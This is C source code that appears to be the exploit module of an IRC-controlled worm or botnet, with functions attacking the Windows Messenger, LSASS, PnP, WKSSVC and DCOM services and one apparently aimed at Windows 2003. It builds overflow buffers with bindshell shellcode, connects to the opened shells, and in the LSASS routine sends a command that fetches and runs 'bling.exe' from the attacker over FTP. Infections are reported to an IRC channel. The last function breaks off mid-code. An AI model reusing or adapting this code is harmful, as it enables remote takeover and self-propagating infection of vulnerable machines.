BOOL MessengerService(EXINFO exinfo)
{
int sockUDP,ver,packetsz;
unsigned char packet[8192];
struct sockaddr_in targetUDP;
struct
{
char os[30];
DWORD SEH;
DWORD JMP;
} targetOS[] =
{
{
"Windows 2000 SP 3 (en)",
0x77ee044c, // unhandledexceptionfilter pointer
0x768d693e // cryptsvc.dll call [esi+48] 0x768d693e
},
{
"Windows XP SP 1 (en)",
0x77ed73b4,
0x7804bf52 //rpcrt4.dll call [edi+6c]
}
};
int TargetOS = FpHost(exinfo.ip, FP_RPC);
if ((TargetOS == OS_WINNT) || (TargetOS == OS_UNKNOWN)) return FALSE;
if (TargetOS == OS_WIN2K) ver = 0;
if (TargetOS == OS_WINXP) ver = 1;
ZeroMemory(&targetUDP, sizeof(targetUDP));
targetUDP.sin_family = AF_INET;
targetUDP.sin_addr.s_addr = finet_addr(exinfo.ip);
targetUDP.sin_port = fhtons(exinfo.port);
packetsz = PreparePacket((char*)packet,sizeof(packet),targetOS[ver].JMP,targetOS[ver].SEH);
if ((sockUDP = fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
{
return FALSE;
}
if (fsendto(sockUDP, (char*)packet, packetsz, 0, (struct sockaddr *)&targetUDP, sizeof(targetUDP)) == -1)
{
return FALSE;
}
fclosesocket(sockUDP);
Sleep(500);
if (ConnectShellEx(exinfo, 9191) == true) {
exploit[exinfo.exploit].stats++;
return TRUE;
}
return FALSE;
}
BOOL lsass2(EXINFO exinfo)
{
int i, targetx, len, targetxOS;
char hostipc[40];
char hostipc2[40*2];
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char req4u[sizeof(reqx4)+20];
char screq[BUFSIZE+sizeof(reqx7)+1500+440];
char screq2k[4348+4060];
char screq2k2[4348+4060];
char recvbuf[1600];
char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4";
char strBuffer[BUFSIZE];
char buffer[IRCLINE], cmd_buff[400];
char smblen;
char unclen;
unsigned short port;
SOCKET sSocket, bSocket;
SOCKADDR_IN ssin, bsin;
targetxOS = FpHost(exinfo.ip, FP_RPC);
if ((targetxOS == OS_UNKNOWN) || (targetxOS == OS_WINNT))
return FALSE;
if (targetxOS == OS_WINXP)
targetx = 0;
else if (rand() % 10)
targetx = 1;
else
targetx = 2;
_snprintf(hostipc, sizeof(hostipc),"\\\\%s\\ipc$", exinfo.ip);
for (i=0; i<40; i++) {
hostipc2[i*2] = hostipc[i];
hostipc2[i*2+1] = 0;
}
memcpy(req4u, reqx4, sizeof(reqx4)-1);
memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
memcpy(req4u+47+strlen(hostipc)*2, reqx4+87, 9);
smblen = 52+(char)strlen(hostipc)*2;
memcpy(req4u+3, &smblen, 1);
unclen = 9 + (char)strlen(hostipc)*2;
memcpy(req4u+45, &unclen, 1);
port = fhtons(LSASS_BSPORT)^(USHORT)0x9999;
memcpy(&bindshell[176], &port, 2);
if ((targetx == 1) || (targetx == 2)) {
memset(buf, NOP, LEN);
//memcpy(&buf[2020], "\x3c\x12\x15\x75", 4);
memcpy(&buf[2020], &ttargetx[targetx].jmpaddr, 4);
memcpy(&buf[2036], &bindshell, strlen(bindshell));
memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
memcpy(&buf[2844], &ttargetx[targetx].jmpaddr, 4); // jmp ebx addr
//memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr
memcpy(&buf[2856], &bindshell, strlen(bindshell));
for (i=0; i<LEN; i++) {
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;
memset(screq2k, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
memset(screq2k2, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
} else {
memset(strBuffer, NOP, BUFSIZE);
memcpy(strBuffer+160, bindshell, strlen(bindshell));
memcpy(strBuffer+1980, strasm, strlen(strasm));
*(long *)&strBuffer[1964]=ttargetx[targetx].jmpaddr;
}
memset(screq, 0x31, BUFSIZE+sizeof(reqx7)+1500);
if ((sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP)) == SOCKET_ERROR)
return FALSE;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
if (fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) {
fclosesocket(sSocket);
return FALSE;
}
if (fsend(sSocket, reqx1, sizeof(reqx1)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx2, sizeof(reqx2)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx3, sizeof(reqx3)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, req4u, smblen+4, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx5, sizeof(reqx5)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx6, sizeof(reqx6)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if ((targetx == 1) || (targetx == 2)) {
memcpy(screq2k, reqx8, sizeof(reqx8)-1);
memcpy(screq2k+sizeof(reqx8)-1, sendbuf, (LEN+1)*2);
memcpy(screq2k2, reqx9, sizeof(reqx9)-1);
memcpy(screq2k2+sizeof(reqx9)-1, sendbuf+4348-sizeof(reqx8)+1, (LEN+1)*2-4348);
memcpy(screq2k2+sizeof(reqx9)-1+(LEN+1)*2-4348-sizeof(reqx8)+1+206, shitx3, sizeof(shitx3)-1);
if (fsend(sSocket, screq2k, 4348, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, screq2k2, 4060, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
} else {
memcpy(screq, reqx7, sizeof(reqx7)-1);
memcpy(screq+sizeof(reqx7)-1, &strBuffer[0], BUFSIZE);
memcpy(screq+sizeof(reqx7)-1+BUFSIZE, shitx1, 9*16);
screq[BUFSIZE+sizeof(reqx7)-1+1500-304-1] = 0;
if (fsend(sSocket, screq, BUFSIZE+sizeof(reqx7)-1+1500-304, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
}
len = frecv(sSocket, recvbuf, 1600, 0);
if ((bSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
memset(&bsin, 0, sizeof(bsin));
bsin.sin_family = AF_INET;
bsin.sin_port = fhtons(LSASS_BSPORT);
bsin.sin_addr.s_addr = finet_addr(exinfo.ip);
if (fconnect(bSocket, (LPSOCKADDR)&bsin, sizeof(bsin)) == -1) {
fclosesocket(sSocket);
fclosesocket(bSocket);
return FALSE;
}
if (frecv(bSocket, recvbuf, 1600, 0) > 0) {
Sleep(500);
_snprintf(cmd_buff, sizeof(cmd_buff),
// "tftp -i %s get %s&%s&exit\n", GetIP(exinfo.sock), filename, filename);
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
if (fsend(bSocket, cmd_buff, strlen(cmd_buff), 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
fclosesocket(bSocket);
return FALSE;
}
fclosesocket(sSocket);
fclosesocket(bSocket);
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent)
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
} else
return FALSE;
}
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum )
{
SOCKADDR_IN addr;
int len;
int sockfd;
unsigned short smblen;
char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];
IRC* irc=(IRC*)conn;
BOOL success=FALSE;
char* thisTarget;
int pnpbindsize=405;
int TargetOS, Target;
char* tOS="";
WSADATA wsa;
fWSAStartup(MAKEWORD(2,0), &wsa);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE;
thisTarget = exinfo.ip;
TargetOS=FpHost(thisTarget,FP_NP);
if (TargetOS==OS_UNKNOWN)
TargetOS=FpHost(thisTarget,FP_SMB);
if (TargetOS == OS_WINNT){
Target=OS_WINNT;
success=FALSE;
}else if (TargetOS==OS_WINXP){
Target=OS_WINXP;
success=FALSE;
}else if (TargetOS==OS_WIN2K){
Target=OS_WIN2K;
success=TRUE;
}else{
success=FALSE;
}
ZeroMemory(&addr,sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = finet_addr(thisTarget);
addr.sin_port = fhtons((unsigned short)exinfo.port);
if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE;
if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if (len <= 10) return FALSE;
if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp,"\\\\%s\\IPC$",thisTarget);
convert_name((char *)ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
// nop
ptr = packet;
memset(packet, '\x90', sizeof(packet));
// Start prepare header -- dETOX mod --
memcpy(RPC_call + 260, Offsets[OffNum], 4);
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
unsigned short port;
port = fhtons(bindport)^(USHORT)0x9999;
memcpy(&bindshell[176],&port,2);
memcpy(ptr,bindshell,pnpbindsize-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE;
frecv(sockfd, recvbuf, 4096, 0);
if (!exinfo.silent && exinfo.verbose){
switch(Target){
case 1:
tOS="WINNT";
break;
case 2:
tOS="WIN2K";
break;
case 3:
tOS="WINXP";
break;
default:
tOS="UNKNOWN/2K3/LINUX";
break;
}
irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip);
}
// if(success){
Sleep(2000);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
// }
return TRUE;
}
//BOOL ScriptGod_WKSSVC(unsigned long nTargetID,EXINFO exinfo,char *target, void* conn)
BOOL sgwkssvc(unsigned long nTargetID,EXINFO exinfo,char *target, void* conn)
{
IRC* irc=(IRC*)conn;
//irc->privmsg(target,"%s %s: Connected to IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
BOOL success=FALSE;
int TargetOS;
// char szShellBuf[ 512 ];
int iShellSize;
// =============================
char* pszTarget;
// ---
char szNetbiosTarget[ 8192 ];
wchar_t wszNetbiosTarget[ 8192 ];
unsigned char szShellcodeEncoded[ ( 405 * 2 ) + 1 ];
unsigned char szExploitsData[ 3500 ];
unsigned long nExploitsDataPos;
wchar_t wszExploitsData[ sizeof( szExploitsData ) ];
// ---
char szIPC[ 8192 ];
NETRESOURCE NetSource;
// ---
char szPipe[ 8192 ];
HANDLE hPipe;
// ---
RPC_ReqBind BindPacket;
unsigned long nBytesWritten;
RPC_ReqNorm ReqNormalHeader;
unsigned long nPacketSize;
unsigned char* pPacket;
unsigned long nPacketPos;
// ============================
TargetOS = FpHost(exinfo.ip, FP_PORT5K);
if(TargetOS != OS_WINXP)
TargetOS = FpHost(exinfo.ip, FP_RPC);
if(TargetOS != OS_WINXP)
return FALSE;
else
success=TRUE;
// irc->privmsg(target,"%s %s: Target running XP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
// parameters
pszTarget=exinfo.ip;
// char URL[MAX_HOSTNAME];
// char fname[_MAX_FNAME];
// sprintf(fname,"eraseme_%d%d%d%d%d.exe",rand()%9,rand()%9,rand()%9,rand()%9,rand()%9);
// _snprintf(URL,sizeof(URL),
// "ftp://*****:*****@%s:%d/%s",
// (PrivateIP(exinfo.ip)?inip:exip),FTP_PORT,fname);
unsigned short port;
port = fhtons(bindport)^(USHORT)0x9999;
memcpy(&bindshell[176],&port,2);
iShellSize=wbindsize;//setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), URL, false, NULL);
if (!iShellSize)
return FALSE;
// get shellcode
//iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename );
//if( !iShellSize )
// return FALSE;
// generate exploits buffer
// ========================
ZeroMemory(szShellcodeEncoded, sizeof(szShellcodeEncoded));
ZeroMemory(szExploitsData, sizeof(szExploitsData));
ZeroMemory(wszExploitsData, sizeof(wszExploitsData));
// fill with NOPs (using inc ecx instead of NOP, 0-terminated-string)
memset(szExploitsData,'A',sizeof(szExploitsData)-1);
// new EIP
*(unsigned long*)(&szExploitsData[Targets[nTargetID].nNewEIP_BufferOffset]) = Targets[nTargetID].nNewEIP;
// some NOPs
nExploitsDataPos = 2300;
// add stack
memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 );
nExploitsDataPos += sizeof( szStack ) - 1;
// add decoder
memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 );
nExploitsDataPos += sizeof( szDecoder ) - 1;
// add shellcode
// - bind port
// - encode
Encode( (unsigned char*)bindshell, iShellSize, szShellcodeEncoded );
// - add
memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) );
nExploitsDataPos += strlen( (char*)szShellcodeEncoded );
// - 0 terminaten for decoder
szExploitsData[ nExploitsDataPos ] = 0;
nExploitsDataPos += 1;
// convert to UNICODE
// ==================
for( int n = 0; n < sizeof( szExploitsData ); n++ )
wszExploitsData[ n ] = szExploitsData[ n ];
//MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) );
_snprintf(szNetbiosTarget,sizeof(szNetbiosTarget), "\\\\%s", pszTarget);
mbstowcs(wszNetbiosTarget,szNetbiosTarget, sizeof(wszNetbiosTarget)/sizeof(wchar_t));
// create NULL session
// ===================
if( strcmpi( pszTarget, "." ) )
{
//_snprintf(szIPC,sizeof(szIPC), "\\\\%s\\", pszTarget);
_snprintf(szIPC,sizeof(szIPC),"\\\\%s\\",pszTarget);
strncat(szIPC,"ipc$",sizeof(szIPC));
ZeroMemory(&NetSource,sizeof(NetSource));
NetSource.lpRemoteName = szIPC;
fWNetAddConnection2(&NetSource,"","",0);
}
// ===================
// connect to pipe
// ===============
//_snprintf(szPipe,sizeof(szPipe),"\\\\%s\\pipe\\wkssvc",pszTarget);
_snprintf(szPipe,sizeof(szPipe),"\\\\%s\\",pszTarget);
strncat(szPipe,"pipe\\wkssvc",sizeof(szPipe));
hPipe = CreateFile(szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
if(hPipe == INVALID_HANDLE_VALUE)
{
fWNetCancelConnection2(NetSource.lpRemoteName, 0, FALSE);
return FALSE;
}
// ===============
// bind packet
// ===========
ZeroMemory(&BindPacket,sizeof(BindPacket));
BindPacket.NormalHeader.versionmaj = 5;
BindPacket.NormalHeader.versionmin = 0;
BindPacket.NormalHeader.type = 11; // bind
BindPacket.NormalHeader.flags = 3; // first + last fragment
BindPacket.NormalHeader.representation = 0x00000010; // little endian
BindPacket.NormalHeader.fraglength = sizeof(BindPacket);
BindPacket.NormalHeader.authlength = 0;
BindPacket.NormalHeader.callid = 1;
BindPacket.maxtsize = 4280;
BindPacket.maxrsize = 4280;
BindPacket.assocgid = 0;
BindPacket.numelements = 1;
BindPacket.contextid = 0;
BindPacket.numsyntaxes = 1;
BindPacket.Interface1.version = 1;
memcpy(BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16);
BindPacket.Interface2.version = 2;
memcpy(BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16);
// send
if(!WriteFile(hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL))
{
//irc->privmsg(target,"%s %s: !WriteFile: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
CloseHandle(hPipe);
fWNetCancelConnection2(NetSource.lpRemoteName, 0, FALSE);
return FALSE;
}
// ===========
// request
// =======
// generate packet
// ---------------
// calc packet size
nPacketSize = 0;
nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
while(nPacketSize % 4)
nPacketSize++;
if(Targets[nTargetID].bCanUse_NetAddAlternateComputerName)
nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
while( nPacketSize % 4 )
nPacketSize++;
nPacketSize += 8; // szWSSKVCUnknown3
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
nPacketSize += 4; // NetAddAlternateComputerName = reserved
else
nPacketSize += 2; // NetValidateName = NameType
// alloc packet
pPacket = (unsigned char*)malloc( nPacketSize );
if( !pPacket )
{
//irc->privmsg(target,"%s %s: !malloc: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
CloseHandle( hPipe );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
ZeroMemory(pPacket,nPacketSize);
// build packet
nPacketPos = 0;
// - szWKSSVCUnknown1
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1;
// - wszNetbiosTarget
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszNetbiosTarget ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget );
nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWKSSVCUnknown2
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1;
}
// - wszExploitsData
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszExploitsData ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData );
nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWSSKVCUnknown3 (only eigth 0x00s)
ZeroMemory(&pPacket[nPacketPos],8);
nPacketPos += 8;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
// NetAddAlternateComputerName = 0
*(DWORD*)&pPacket[ nPacketPos ] = 0;
nPacketPos += sizeof( DWORD );
}
else
{
// NetValidateName = NetSetupMachine
*(unsigned short*)&pPacket[ nPacketPos ] = 1;
nPacketPos += 2;
}
// header
ZeroMemory(&ReqNormalHeader,sizeof(ReqNormalHeader));
ReqNormalHeader.NormalHeader.versionmaj = 5;
ReqNormalHeader.NormalHeader.versionmin = 0;
ReqNormalHeader.NormalHeader.type = 0; // request
ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment
ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian
ReqNormalHeader.NormalHeader.authlength = 0;
ReqNormalHeader.NormalHeader.callid = 1;
ReqNormalHeader.prescontext = 0;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
ReqNormalHeader.opnum = 27; // NetrAddAlternateComputerName
else
ReqNormalHeader.opnum = 25; // NetrValidateName2
// send
if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) )
{
//irc->privmsg(target,"%s %s: !SendReqPacket_Part: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// =======
// clean up
// =================;
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
if (success)
{
Sleep(5000);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
return TRUE;
}
BOOL dcom(EXINFO exinfo)
{
char sendbuf[IRCLINE];
if (exinfo.port == 445) {
NETRESOURCEW nr;
if (!ConnectViaNullSession(exinfo.ip, &nr))
return FALSE;
else {
char szPipePath[MAX_PATH];
sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", exinfo.ip);
HANDLE hFile = CreateFile(szPipePath, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
CloseNullSession(exinfo.ip);
return FALSE;
}
// sprintf(sendbuf, "[dcom]: Connected to pipe \\\\%s\\pipe\\epmapper", exinfo.ip);
// irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
int TargetOS = FpHost(exinfo.ip, FP_PORT5K);
// get shellcode
DWORD reqbufsize;
char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, TRUE);
if (!reqbuf) {
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
unsigned long lWritten;
char *szInBuf = (char *)malloc(100000);
memset(szInBuf, 0, 100000);
// send the bind string
DWORD dwRead;
TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
if (szInBuf[2] != 0x0C) {
free(szInBuf);
free(reqbuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
// send the evil request
if (!WriteFile(hFile, reqbuf, reqbufsize, &lWritten, 0)) {
free(szInBuf);
free(reqbuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
BOOL Result = ReadFile(hFile, szInBuf, 10000, &dwRead, NULL);
free(reqbuf);
free(szInBuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
if (Result == TRUE) {
return FALSE;
}
}
} else { // port 135 and others
int TargetOS = FpHost(exinfo.ip, FP_RPC);
if (TargetOS == OS_WINNT)
return FALSE;
// get a funky fresh socket
SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (sSocket == SOCKET_ERROR)
return FALSE;
// fill in sockaddr and resolve the host
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
// get shellcode
DWORD reqbufsize;
char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, FALSE);
if (!reqbuf) {
fclosesocket(sSocket);
return FALSE;
}
// connect to the server
int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin));
if (iErr == -1) { // connect failed, exit
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// send the bind string
if (fsend(sSocket, bindstr, sizeof(bindstr)-1, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// read reply
char recvbuf[4096];
frecv(sSocket, recvbuf, 4096, 0);
// Send the evil request
if (fsend(sSocket, reqbuf, reqbufsize, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// read reply
if (frecv(sSocket, recvbuf, 4096, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
free(reqbuf);
// Close the socket
fclosesocket(sSocket);
}
sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip);
for (int i=0; i < 6; i++) {
if (searchlog(sendbuf)) {
sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
break;
}
Sleep(5000);
}
return TRUE;
}
BOOL scvx(char *target, void* conn,EXINFO exinfo)
{
IRC* irc=(IRC*)conn;
SOCKET sockfd;
// int gport;
int len, len1, TargetOS;
unsigned short port = 135;
char *buf1="0x001";
char *buf2="0x001";
char lport[] = "\x00\xFF\xFF\x8b";
struct sockaddr_in their_addr;
unsigned short tport;
unsigned char *sc;
TargetOS = FpHost(exinfo.ip, FP_SMB);
if (TargetOS == OS_WIN2K3)
{
//type = 0;
// gport=fhtons(bindport);
// memcpy(&lport[1], &gport, 2);
// *(long*)lport = *(long*)port^0x9432BF80;
// memcpy(&sc[471],&lport,4);
tport=fhtons(bindport)^(USHORT)0x9999;
memcpy(&bindshell[176],&tport,2);
sc=(unsigned char *)bindshell;
// memcpy(sc+36, (unsigned char *) &dcomtargets[type].ret, 4);
their_addr.sin_family = AF_INET;
their_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
their_addr.sin_port = fhtons(port);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
return FALSE;
if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(their_addr)) == SOCKET_ERROR)
return FALSE;
len=strlen((const char*)sc);
memcpy(buf2,fcr,sizeof(fcr));
len1=sizeof(fcr);
*(unsigned long *)(mmps)=*(unsigned long *)(mmps)+strlen((const char*)sc)/2;
*(unsigned long *)(svcd+8)=*(unsigned long *)(svcd+8)+strlen((const char*)sc)/2;
memcpy(buf2+len1,mmps,sizeof(mmps));
len1=len1+sizeof(mmps);
memcpy(buf2+len1,sc,strlen((const char*)sc));
len1=len1+strlen((const char*)sc);
memcpy(buf2+len1,sc1,sizeof(sc1));
len1=len1+sizeof(sc1);
